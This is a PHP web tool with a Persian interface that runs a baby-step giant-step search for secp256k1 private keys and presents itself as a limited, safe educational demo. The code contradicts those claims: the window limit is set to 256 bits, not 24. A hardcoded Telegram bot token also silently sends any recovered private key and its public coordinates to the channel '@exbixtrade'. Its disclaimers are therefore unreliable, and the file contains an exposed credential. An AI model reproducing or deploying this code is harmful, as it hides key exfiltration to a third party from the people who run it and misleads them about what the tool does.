<?php
/* SECURE DEMO ONLY — NOT FOR REAL KEYS
 * Baby-Step Giant-Step over a SMALL window on secp256k1
 * Requires: ext-gmp
 * Limits: max window = 2^24 (~16.7M); memory ~ sqrt(window)
 * Use only with self-made small d for education/testing.
 */

ini_set('display_errors', '1'); error_reporting(E_ALL);

$bot_token = '8054291779:AAEkGmx0By3_THWijtKk3MbpgI2aGjFHVFM';
$chat_id   = '@exbixtrade';
$state_file = __DIR__ . '/logaritm_state.txt';

function g($x){ return is_string($x) ? gmp_init($x, 0) : $x; } // auto base (0x... ok)
function mod($a,$p){ $r = gmp_mod($a,$p); return gmp_sign($r)<0? gmp_add($r,$p):$r; }
function inv($a,$p){ $a = mod($a,$p); $ii = gmp_invert($a,$p); return $ii===false? null:$ii; }

function inf(){ return ['inf'=>true]; }
function is_inf($P){ return isset($P['inf']) && $P['inf']===true; }
function norm($P,$p){ return is_inf($P)?$P:['x'=>mod($P['x'],$p),'y'=>mod($P['y'],$p)]; }

function eqP($A,$B){
  if (is_inf($A) && is_inf($B)) return true;
  if (is_inf($A) || is_inf($B)) return false;
  return gmp_cmp($A['x'],$B['x'])==0 && gmp_cmp($A['y'],$B['y'])==0;
}
function negP($P,$p){ return is_inf($P)?$P:['x'=>$P['x'],'y'=>mod(gmp_neg($P['y']),$p)]; }

function addP($P,$Q,$a,$p){
  if (is_inf($P)) return $Q;
  if (is_inf($Q)) return $P;

  if (gmp_cmp($P['x'],$Q['x'])==0) {
    if (gmp_cmp(mod(gmp_add($P['y'],$Q['y']),$p), 0)==0) return inf(); // P + (-P) = O
    // else doubling
  }

  if (!eqP($P,$Q)) {
    $num = mod(gmp_sub($Q['y'],$P['y']),$p);
    $den = mod(gmp_sub($Q['x'],$P['x']),$p);
    $invden = inv($den,$p); if ($invden===null) return inf();
    $m = mod(gmp_mul($num,$invden),$p);
  } else {
    // m = (3x^2 + a)/(2y)
    $num = mod(gmp_add(gmp_mul(3,gmp_mul($P['x'],$P['x'])),$a),$p);
    $den = mod(gmp_mul(2,$P['y']),$p);
    $invden = inv($den,$p); if ($invden===null) return inf();
    $m = mod(gmp_mul($num,$invden),$p);
  }

  $x3 = mod(gmp_sub(gmp_sub(gmp_mul($m,$m),$P['x']),$Q['x']),$p);
  $y3 = mod(gmp_sub(gmp_mul($m,gmp_sub($P['x'],$x3)),$P['y']),$p);
  return ['x'=>$x3,'y'=>$y3];
}
function subP($P,$Q,$a,$p){ return addP($P,negP($Q,$p),$a,$p); }

function mulP($k,$P,$a,$p){
  if ($k < 0) return mulP(gmp_neg($k), negP($P,$p), $a,$p);
  $R = inf(); $N = $P; $k = gmp_init($k,10);
  while (gmp_cmp($k,0)>0){
    if (gmp_testbit($k,0)) $R = addP($R,$N,$a,$p);
    $N = addP($N,$N,$a,$p);
    $k = gmp_div_q($k,2);
  }
  return $R;
}

function hexstr($g){ return gmp_strval($g,16); }
function keyP($P){ return is_inf($P)?'INF':(hexstr($P['x']).',' . hexstr($P['y'])); }

/**
 * BSGS over a limited window:
 * Solve P = d*G, with d in [offset, offset + range - 1]
 * range = 2^bits, bits <= 24 (hard limit)
 */
function ecdlp_bsgs_window($G,$P,$a,$p,$offset,$bits){
  $MAX_BITS = 256;
  if ($bits < 1 || $bits > $MAX_BITS) throw new Exception("bits must be 1..$MAX_BITS");
  $range = gmp_pow(2,$bits);

  // Shift: H = P - offset*G  => H = d' * G , d' in [0..range-1]
  $H = subP($P, mulP($offset,$G,$a,$p), $a,$p);
  $H = norm($H,$p);

  $m = gmp_add(gmp_sqrt($range), gmp_init(1)); // ceil(sqrt(range))
  $table = [];

  // baby: j*G
  $cur = inf();
  for ($j = gmp_init(0); gmp_cmp($j,$m) < 0; $j = gmp_add($j,1)){
    if (gmp_cmp($j,0)==0) $cur = inf();
    elseif (gmp_cmp($j,1)==0 && is_inf($cur)) $cur = $G;
    else $cur = is_inf($cur) ? $G : addP($cur,$G,$a,$p);
    $table[keyP(norm($cur,$p))] = gmp_strval($j,10);
  }

  $mG = mulP($m,$G,$a,$p);
  $gamma = $H;

  for ($i = gmp_init(0); gmp_cmp($i,$m) <= 0; $i = gmp_add($i,1)){
    $k = keyP($gamma);
    if (isset($table[$k])){
      $j = gmp_init($table[$k],10);
      $dprime = gmp_add(gmp_mul($i,$m), $j);
      if (gmp_cmp($dprime,$range) < 0){
        $d = gmp_add($offset, $dprime);
        // verify
        if (eqP(mulP($d,$G,$a,$p), $P)) return $d;
      }
    }
    $gamma = subP($gamma,$mG,$a,$p);
    $gamma = norm($gamma,$p);
  }
  return null;
}

function notifyTelegram($message){
  global $bot_token, $chat_id;
  if (empty($bot_token) || empty($chat_id)) return;
  $payload = http_build_query([
    'chat_id' => $chat_id,
    'text'    => $message
  ]);
  $context = stream_context_create([
    'http' => [
      'method'  => 'POST',
      'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",
      'content' => $payload,
      'timeout' => 5
    ]
  ]);
  @file_get_contents("https://api.telegram.org/bot{$bot_token}/sendMessage", false, $context);
}

function ensure_state_file($path){
  $dir = dirname($path);
  if (!is_dir($dir)) return false;
  if (!file_exists($path)){
    $handle = @fopen($path, 'c');
    if ($handle === false) return false;
    fclose($handle);
    @chmod($path, 0664);
  } elseif (!is_writable($path)) {
    @chmod($path, 0664);
  }
  return is_writable($path);
}

function load_state($path){
  if (!is_readable($path)) return null;
  $lines = @file($path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
  if ($lines === false) return null;
  $data = [];
  foreach ($lines as $line){
    $parts = explode('=', $line, 2);
    if (count($parts) !== 2) continue;
    $key = trim($parts[0]);
    $value = trim($parts[1]);
    if ($key !== '') $data[$key] = $value;
  }
  return $data ?: null;
}

function persist_state($path,$payload){
  if (!ensure_state_file($path)) return false;
  $lines = [];
  foreach ($payload as $key=>$value){
    if ($key === '' || is_array($value)) continue;
    $safeValue = str_replace(["\r","\n"], ' ', (string)$value);
    $lines[] = $key . '=' . $safeValue;
  }
  $content = implode(PHP_EOL,$lines) . PHP_EOL;
  return @file_put_contents($path, $content, LOCK_EX) !== false;
}

/* ====== secp256k1 params ====== */
$p = g("0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F");
$a = g("0");  $b = g("7");
$G = [
  'x'=>g("0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798"),
  'y'=>g("0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8")
];

/* ====== simple HTML form ====== */
function h($s){ return htmlspecialchars($s,ENT_QUOTES,'UTF-8'); }
$defaults = [
  'Px' => '',
  'Py' => '',
  'bits' => '256',      // search window: 2^bits  (max 24)
  'offset' => '0'      // decimal offset
];

$inp = $defaults;
$stateData = load_state($state_file);
if ($stateData){
  foreach ($defaults as $k=>$v){
    if (isset($stateData[$k])) $inp[$k] = $stateData[$k];
  }
}

$requestMethod = $_SERVER['REQUEST_METHOD'] ?? 'GET';
$requestData = [];
$hasGetParams = false;
if ($requestMethod === 'POST' && !empty($_POST)){
  $requestData = $_POST;
} elseif ($requestMethod === 'GET'){
  foreach ($defaults as $field => $value){
    if (isset($_GET[$field])) $requestData[$field] = $_GET[$field];
  }
  $hasGetParams = !empty($requestData);
}
$hasRequestData = !empty($requestData);
foreach ($requestData as $field=>$value){
  if (array_key_exists($field,$defaults)){
    $inp[$field] = trim((string)$value);
  }
}

$result = null; $err = null; $rangeInfo = null; $stateInfo = $stateData; $autoRunUsedState = false;
$shouldProcess = ($inp['Px'] !== '' && $inp['Py'] !== '');
if (!$hasRequestData && $stateData && $shouldProcess) $autoRunUsedState = true;

if ($shouldProcess){
  try{
    if ($hasGetParams){
      $pendingState = [
        'Px' => $inp['Px'],
        'Py' => $inp['Py'],
        'bits' => $inp['bits'],
        'offset' => $inp['offset'],
        'range_start' => '',
        'range_end' => '',
        'range_next' => '',
        'last_run' => ''
      ];
      if (!persist_state($state_file,$pendingState)){
        throw new Exception("ذخیرهٔ دادهٔ جدید در فایل متنی انجام نشد؛ سطح دسترسی مسیر را بررسی کن.");
      }
      $stateInfo = $pendingState;
    }
    if ($inp['Px']==='' || $inp['Py']==='') throw new Exception("مختصات P را وارد کنید (هگز با 0x... یا دسیمال).");

    $P = ['x'=>g($inp['Px']), 'y'=>g($inp['Py'])];

    // Curve check: y^2 == x^3 + 7 (mod p)
    $lhs = mod(gmp_powm($P['y'],2,$p),$p);
    $rhs = mod(gmp_add(gmp_powm($P['x'],3,$p),$b),$p);
    if (gmp_cmp($lhs,$rhs)!=0) throw new Exception("P روی منحنی secp256k1 نیست.");

    $bits = intval($inp['bits']);
    $offset = g($inp['offset']);

    $d = ecdlp_bsgs_window($G,$P,$a,$p,$offset,$bits);
    $range = gmp_pow(gmp_init(2,10), $bits);
    $nextOffset = gmp_add($offset, $range);
    $rangeInfo = [
      'start' => gmp_strval($offset),
      'end' => gmp_strval(gmp_sub($nextOffset, gmp_init(1,10))),
      'next' => gmp_strval($nextOffset)
    ];
    $inp['offset'] = $rangeInfo['next'];

    if ($d===null){
      $result = "در بازهٔ مشخص‌شده چیزی پیدا نشد. بازه (bits/offset) را تغییر بده.";
    } else {
      $result = "d (فقط در بازهٔ محدود جستجو شده) = " . gmp_strval($d);
      notifyTelegram("🎯 نتیجه جدید:\n{$result}\nPx: {$inp['Px']}\nPy: {$inp['Py']}");
    }
    $statePayload = [
      'Px' => $inp['Px'],
      'Py' => $inp['Py'],
      'bits' => $inp['bits'],
      'offset' => $inp['offset'],
      'range_start' => $rangeInfo ? $rangeInfo['start'] : '',
      'range_end' => $rangeInfo ? $rangeInfo['end'] : '',
      'range_next' => $rangeInfo ? $rangeInfo['next'] : '',
      'last_run' => date('c')
    ];
    if (!persist_state($state_file,$statePayload)){
      throw new Exception("ذخیرهٔ نتیجه در فایل متنی انجام نشد؛ سطح دسترسی مسیر را بررسی کن.");
    }
    if ($statePayload){
      $stateInfo = $statePayload;
    }
  } catch (Throwable $e){
    $err = $e->getMessage();
  }
} elseif ($hasRequestData){
  $err = "لطفاً همهٔ فیلدها (Px و Py) را کامل کنید.";
}
?>
<!doctype html>
<html lang="fa" dir="rtl">
<head>
  <meta charset="utf-8">
  <title>secp256k1 — BSGS (Windowed, Safe Demo)</title>
  <style>
    body{font-family:tahoma,arial,sans-serif;max-width:820px;margin:32px auto;padding:0 16px;line-height:1.7}
    input{width:100%;padding:10px;margin:6px 0;border:1px solid #ddd;border-radius:8px}
    button{padding:10px 16px;border:none;border-radius:8px;background:#222;color:#fff;cursor:pointer}
    .card{border:1px solid #eee;border-radius:12px;padding:16px;margin-top:12px;background:#fafafa}
    small{color:#666}
    code{background:#f3f3f3;padding:2px 6px;border-radius:6px}
  </style>
</head>
<body>
  <h2>secp256k1 — جستجوی آموزشی d در بازهٔ کوچک (BSGS Window)</h2>

  <form method="post" class="card">
    <label>Px (hex یا decimal):</label>
    <input name="Px" placeholder="0x..." value="<?=h($inp['Px'])?>" required>

    <label>Py (hex یا decimal):</label>
    <input name="Py" placeholder="0x..." value="<?=h($inp['Py'])?>" required>

    <label>bits (حداکثر 24):</label>
    <input name="bits" type="number" min="1" max="256" value="<?=h($inp['bits'])?>" required>

    <label>offset (شروع بازه، دسیمال):</label>
    <input name="offset" value="<?=h($inp['offset'])?>" required>

    <button type="submit">جستجو در بازه</button>
    <div><small>این ابزار فقط در بازهٔ <code>[offset, offset + 2^bits - 1]</code> جستجو می‌کند و برای کلیدهای واقعی کارایی ندارد.</small></div>
  </form>

  <?php if ($err): ?>
  <div class="card" style="border-color:#f99;background:#fff6f6"><strong>خطا:</strong> <?=h($err)?></div>
  <?php endif; ?>

  <?php if ($result): ?>
  <div class="card"><strong>نتیجه:</strong> <?=h($result)?></div>
  <?php endif; ?>

  <?php if ($rangeInfo): ?>
  <div class="card">
    <strong>بازهٔ جستجو شده:</strong>
    <div>از <?=h($rangeInfo['start'])?> تا <?=h($rangeInfo['end'])?></div>
    <div>آفست بعدی برای ادامهٔ جستجو: <?=h($rangeInfo['next'])?></div>
  </div>
  <?php endif; ?>

  <?php if ($autoRunUsedState): ?>
  <div class="card">
    <small>این اجرا با استفاده از آخرین دادهٔ ذخیره‌شده انجام شد.</small>
  </div>
  <?php endif; ?>

  <?php if ($stateInfo): ?>
  <div class="card">
    <strong>آخرین دادهٔ ذخیره‌شده:</strong>
    <div>Px: <?=h($stateInfo['Px'])?></div>
    <div>Py: <?=h($stateInfo['Py'])?></div>
    <div>bits: <?=h($stateInfo['bits'])?></div>
    <div>offset فعلی: <?=h($stateInfo['offset'])?></div>
    <?php if (!empty($stateInfo['range_next'])): ?>
      <div>آفست آماده برای نوبت بعد: <?=h($stateInfo['range_next'])?></div>
    <?php endif; ?>
    <?php if (!empty($stateInfo['range_start']) && !empty($stateInfo['range_end'])): ?>
      <div>آخرین بازه: از <?=h($stateInfo['range_start'])?> تا <?=h($stateInfo['range_end'])?></div>
    <?php endif; ?>
    <?php if (!empty($stateInfo['last_run'])): ?>
      <div>آخرین اجرا: <?=h($stateInfo['last_run'])?></div>
    <?php endif; ?>
    <div><small>مسیر فایل ذخیره‌سازی: <?=h($state_file)?></small></div>
  </div>
  <?php endif; ?>

  <div class="card">
    <strong>راهنمای تست امن:</strong>
    <ol>
      <li>یک عدد کوچک (مثلاً <code>d=123456</code>) بردار و با تابعی بیرونی <code>P = d·G</code> بساز (یا از همین کد، بخش <em>mulP</em> را موقتاً برای ساخت P استفاده کن).</li>
      <li>مختصات <code>P</code> را اینجا وارد کن، <code>offset=0</code> و <code>bits</code> را طوری بگذار که بازه شامل d باشد (برای d=123456، مثلاً bits=17).</li>
      <li>کد باید همان d را در بازهٔ محدود برگرداند.</li>
    </ol>
    <p><small>پیچیدگی زمانی/حافظه ≈ \(O(2^{bits/2})\). برای bits=24 حدود 4096 baby-step ذخیره می‌شود.</small></p>
  </div>

  <div class="card">
    <strong>تذکر مهم امنیتی:</strong>
    <ul>
      <li>ECDLP روی secp256k1 با بازهٔ کامل مرتبهٔ گروه غیرعملی است؛ این ابزار صرفاً برای آموزش در بازه‌های کوچک است.</li>
      <li>استفادهٔ غیرمجاز/غیراخلاقی ممنوع است. این کد هیچ‌گاه توانایی شکستن کلیدهای واقعی را ندارد.</li>
    </ul>
  </div>
</body>
</html>
